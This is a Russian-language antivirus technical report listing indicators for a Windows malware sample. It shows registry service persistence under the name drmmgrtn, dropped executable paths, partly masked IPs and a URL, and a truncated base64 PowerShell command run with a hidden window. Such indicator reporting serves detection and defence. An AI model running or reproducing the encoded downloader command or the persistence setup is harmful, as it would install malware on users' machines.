Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\drmmgrtn] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\drmmgrtn] 'ImagePath' = '"%WINDIR%\SysWOW64\TaskSchdPS\drmmgrtn.exe"'
- 'drmmgrtn' "%WINDIR%\SysWOW64\TaskSchdPS\drmmgrtn.exe"
- 'drmmgrtn' %WINDIR%\SysWOW64\TaskSchdPS\drmmgrtn.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...
- %TEMP%\word\2019\y85mi4vtd.exe
- %WINDIR%\syswow64\taskschdps\drmmgrtn.exe
- %TEMP%\word\2019\y85mi4vtd.exe в %WINDIR%\syswow64\taskschdps\drmmgrtn.exe
- '67.##.210.95':80
- '16#.#41.242.173':8080
- http://qs##ide.com/img/0/
- http://16#.###.242.173:8080/uQqt/ via 16#.#41.242.173
- DNS ASK qs##ide.com
- '%TEMP%\word\2019\y85mi4vtd.exe'
- '%WINDIR%\syswow64\taskschdps\drmmgrtn.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAHQAdQByADAAOQAxAD0AKAAoACcAUQAnACsAJwBkAHgAJwApACsAKAAnADEAOQBtACcAKwAnADkAJwApACkAOwAuACgAJwBuACcAKwAnAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHQARQBNAHAAXAB3AE8AUgBEAFwAMgAwAD...' (со скрытым окном)